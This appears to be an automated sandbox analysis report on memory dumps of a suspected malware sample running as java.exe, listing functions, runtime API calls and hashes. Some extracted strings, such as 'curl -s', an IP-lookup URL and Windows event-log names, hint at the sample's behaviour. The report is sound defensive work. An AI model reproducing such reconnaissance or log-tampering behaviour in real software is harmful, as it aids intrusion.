                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@V?$ostreambuf_iterator@$?good@ios_base@std@@D@std@@@std@@@std@@Lockit@std@@$??0_??1_?flush@?$basic_ostream@?getloc@ios_base@std@@?put@?$time_put@?setstate@?$basic_ios@?uncaught_exceptions@std@@Bid@locale@std@@D@std@@@2@Getcat@?$time_put@Getgloballocale@locale@std@@Locimp@12@Osfx@?$basic_ostream@Utm@@V12@V32@V42@@Vfacet@locale@2@Vios_base@2@Vlocale@2@
                                        • String ID: Security$System
                                        • API String ID: 2601024164-2661570791
                                        • Opcode ID: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
                                        • Instruction ID: 92385444aaf9607a46812807744570ee372c8aded84525591959173392dfb2cf
                                        • Opcode Fuzzy Hash: 32f99a87d3a5ab311aaa68574cd87bda19d4f3e88d22cf0ee314562ff2212286
                                        • Instruction Fuzzy Hash: 83718A22609A8185EF64CF15E7A077E7761FBA5B80F088532EAAE937A4DF3CD445C340
                                        Function 00007FF65E1F32E0 Relevance: 13.6, APIs: 9, Instructions: 129COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3329
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F3349
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3359
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F33B5
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F33DF
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F340E
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1F3459
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1F3460
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1F346D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 3107587312-0
                                        • Opcode ID: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction ID: eb4576c565159a16ef505755efa52a663c7bd3fc41f166b5e9c943f59859230d
                                        • Opcode Fuzzy Hash: 4a2502ecc8ca070d43367042e3d12e437e7251f46653fbf343002d1584a05c5c
                                        • Instruction Fuzzy Hash: DB514132608A8186EF25CF19E6D063CB7A0FFA4F95B198536DA5E937A0CE2DD4468340
                                        Function 00007FF65E1F5350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: \java.exe
                                        • API String ID: 2016347663-3009632800
                                        • Opcode ID: 4bf9be07dc1a305eeaf47fa471ca790812da740372db822ec18e086f487c3532
                                        • Instruction ID: 96e213d36192a345903dc2952227ba1a356614404e97cbf30276789d11a8dc86
                                        • Opcode Fuzzy Hash: 4bf9be07dc1a305eeaf47fa471ca790812da740372db822ec18e086f487c3532
                                        • Instruction Fuzzy Hash: 5141E162B09B4191EE209B15E6442AD6351FB58BE0F980731EABDAB7E5EF3CD441C350
                                        Function 00007FF65E1F3C80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3D6A
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3D79
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3DAD
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3DB4
                                        • memmove.VCRUNTIME140(?,00000000,00000008,?,00007FF65E1F1568), ref: 00007FF65E1F3DC3
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F3DEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: curl -s
                                        • API String ID: 2016347663-820363595
                                        • Opcode ID: a562037bf8f08733c6859b3403078e9e87e419d0620c49857303a3a5aa416be6
                                        • Instruction ID: f6b3f749150e1a601e4092cf422229bb363b1ca2c973baf51d9dca3e4da9320f
                                        • Opcode Fuzzy Hash: a562037bf8f08733c6859b3403078e9e87e419d0620c49857303a3a5aa416be6
                                        • Instruction Fuzzy Hash: 8241A361B0974195EE209B169A042B86255EF54BD0F980632EE7D9B7D6DF3CE041C3A0
                                        Function 00007FF65E1F2CC0 Relevance: 10.8, APIs: 7, Instructions: 267COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturnmemmove$Concurrency::cancel_current_task$?out@?$codecvt@_Mbstatet@@Mbstatet@@@std@@
                                        • String ID:
                                        • API String ID: 525765215-0
                                        • Opcode ID: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction ID: c0eb847db99d27918d8ad98ea4f41f5a29fc1fcfb873de9496dc676edcac02ef
                                        • Opcode Fuzzy Hash: c6cdeb64eca4f1f961e730b4080fa50bdbe3b7e8eb71886a262a1a5eee0e9623
                                        • Instruction Fuzzy Hash: D2B1E362F18B418AFF20CBA4D1542EC2362EB65798F485231EE6DA7BD9DE3CD045C390
                                        Function 00007FF65E1FB470 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB53E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB58D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB5CC
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1FB618
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB665
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        • Opcode ID: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction ID: 37910a63bdbe4dadaeb72cbd7d512faff53cad1fc5281f9e88c9dee1cfb39a31
                                        • Opcode Fuzzy Hash: 105f28b83217c533a0621a35a7ac762c2119fe9a0180d406f36b6523ef19bbb5
                                        • Instruction Fuzzy Hash: DA51C4A2F18B4295FF10CB75D6507BC2321EB657A4F045332FA6DA2AD9EE2CD585C340
                                        Function 00007FF65E1FBFF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC0C2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC111
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC150
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1FC1A0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FC1ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: type_error
                                        • API String ID: 450636425-1406221190
                                        • Opcode ID: 294e30e33237f614d553a8616d03b456f925f8fa26abcf6bbcb68f5e37fb1cb1
                                        • Instruction ID: 37c37e330ca2b3612c2d577a6fb25ae4fc4d9da7d5dda5ee772c263ce7c59a77
                                        • Opcode Fuzzy Hash: 294e30e33237f614d553a8616d03b456f925f8fa26abcf6bbcb68f5e37fb1cb1
                                        • Instruction Fuzzy Hash: 1751B562E18B8294EF10CF75D6903BC2321EB647A4F445732FA6CA2AD9EF6CD194D344
                                        Function 00007FF65E1F38C0 Relevance: 10.6, APIs: 7, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$?uncaught_exceptions@std@@Concurrency::cancel_current_taskD@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3994297871-0
                                        • Opcode ID: 5efb458ff86e86285e27d9c52f97ec16f8b9645881acf75e5b2c9e820c793c3f
                                        • Instruction ID: 30e01af48731139e14168217f432e1d0b6246ffd6905d08a540ff8771f814ffb
                                        • Opcode Fuzzy Hash: 5efb458ff86e86285e27d9c52f97ec16f8b9645881acf75e5b2c9e820c793c3f
                                        • Instruction Fuzzy Hash: EF41D262B09B4281EE209B26E6043B96351BF64FD0F084231EE7EAB796DF3CD4818354
                                        Function 00007FF65E1FBD00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBDD2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBE21
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBE60
                                        • __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1FBEB0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FBEFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memmove$__std_exception_copy
                                        • String ID: other_error
                                        • API String ID: 450636425-896093151
                                        • Opcode ID: 31ea6dbdf5b28761d069e831836c2231da87d872b6197d28bd07c80b67e1e4fa
                                        • Instruction ID: cc1676501ab72c0b77aac99d8dc68bed154a729f35fb808e03dca5425a34d312
                                        • Opcode Fuzzy Hash: 31ea6dbdf5b28761d069e831836c2231da87d872b6197d28bd07c80b67e1e4fa
                                        • Instruction Fuzzy Hash: CD51C662E15B4195EF10CF75D6907BC2321EB647A8F445732FA6CA2AD9EF6CD180C340
                                        Function 00007FF65E1F3710 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: https://api.ipify.org
                                        • API String ID: 1489393663-2202801394
                                        • Opcode ID: c8c14aa842574fd009ddf9e4f8489f603fb97367f0db299a64f8336e29875efc
                                        • Instruction ID: b6dcebe1dc1c8166b37f9b661a704924f19fd0cfa757202a79ff0489c2a062ef
                                        • Opcode Fuzzy Hash: c8c14aa842574fd009ddf9e4f8489f603fb97367f0db299a64f8336e29875efc
                                        • Instruction Fuzzy Hash: D941B362B09B4181EE209B12A6043AD6361BB58BD4F580335EF7D5B785DF3DE48183A4
                                        Function 00007FF65E1F5210 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Application$Security
                                        • API String ID: 2075926362-3957089671
                                        • Opcode ID: 91129967e5f474a8559f9e92a49f95da33b47701dd3b920b909fce4831cfa8d4
                                        • Instruction ID: 1edd787d3d4ff33dd315a50d51db6fe69637f69873cb5a9447730ed48b6c08bb
                                        • Opcode Fuzzy Hash: 91129967e5f474a8559f9e92a49f95da33b47701dd3b920b909fce4831cfa8d4
                                        • Instruction Fuzzy Hash: 4E31EB62B0974185EE249B5596402B92294EF24BF4F6C0730FE7D977D1DF7CE8918390
                                        Function 00007FF65E1F21A0 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF65E1F21C0
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        • ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF65E1F2216
                                        • ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF65E1F2232
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1F2242
                                        • ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF65E1F2251
                                        • ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF65E1F2265
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
                                        • String ID:
                                        • API String ID: 3292048638-0
                                        • Opcode ID: b916503ec65f24a8914a35f5d9ad6752db60bb27910833d0bf65805ffbe94532
                                        • Instruction ID: 77efe4691f9a846ddacc561a917fe9af559bcbc66ba0baca4d95a9bec9e0bae7
                                        • Opcode Fuzzy Hash: b916503ec65f24a8914a35f5d9ad6752db60bb27910833d0bf65805ffbe94532
                                        • Instruction Fuzzy Hash: DF313E32A05B4586EF20DF66F65426AB3A0FB98B80F184135DB8E53B65EF3CE094C341
                                        Function 00007FF65E1F8E00 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 318COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: Security$System
                                        • API String ID: 432778473-2661570791
                                        • Opcode ID: 34f75a92fe2883e6bef5124e5d73f19cf48c367034ce9e8187bb623e8f67000d
                                        • Instruction ID: 01578b8c4caad32f295d70011f96f48fe8b7f52b2ef0aa0546d5fc38b007cc0f
                                        • Opcode Fuzzy Hash: 34f75a92fe2883e6bef5124e5d73f19cf48c367034ce9e8187bb623e8f67000d
                                        • Instruction Fuzzy Hash: 5BC1F072A09B8186EF219F65E6403AC33A1EB64B84F088135EB9D67746EF3CD191C390
                                        Function 00007FF65E1F8720 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 252COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$_invalid_parameter_noinfo_noreturn
                                        • String ID: System
                                        • API String ID: 2822070131-3470857405
                                        • Opcode ID: 6e6eb4d2878bb9674ee793371b75d8ffaf70bd0a5a0b79eac3d4ef2fec82ea3c
                                        • Instruction ID: 533044e66634ecfe9612fc8cf0cfaff9f5a32889ed1faf0901f35635cd81eec1
                                        • Opcode Fuzzy Hash: 6e6eb4d2878bb9674ee793371b75d8ffaf70bd0a5a0b79eac3d4ef2fec82ea3c
                                        • Instruction Fuzzy Hash: ACB1D662A08B8681EF218F24D6402BD6760FBA5794F189131EBAD63696DF3CE5C1C390
                                        Function 00007FF65E1F2A40 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                                        Download Yara Rule
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F2B12
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                          • Part of subcall function 00007FF65E1F11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF65E1F11CB
                                        • memmove.VCRUNTIME140 ref: 00007FF65E1F2B33
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F2B4F
                                          • Part of subcall function 00007FF65E1F1120: __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1F1164
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F2BB5
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F2BBE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemmove
                                        • String ID:
                                        • API String ID: 144170543-0
                                        • Opcode ID: e7cfce1c0d0b2e6765443c67114fc8dbc29c1e00c1e070038aa946d8ba5488e3
                                        • Instruction ID: 9a556e68644941085716d6a5fb785260219a8cacbe6f26de6ef2d43383899b9c
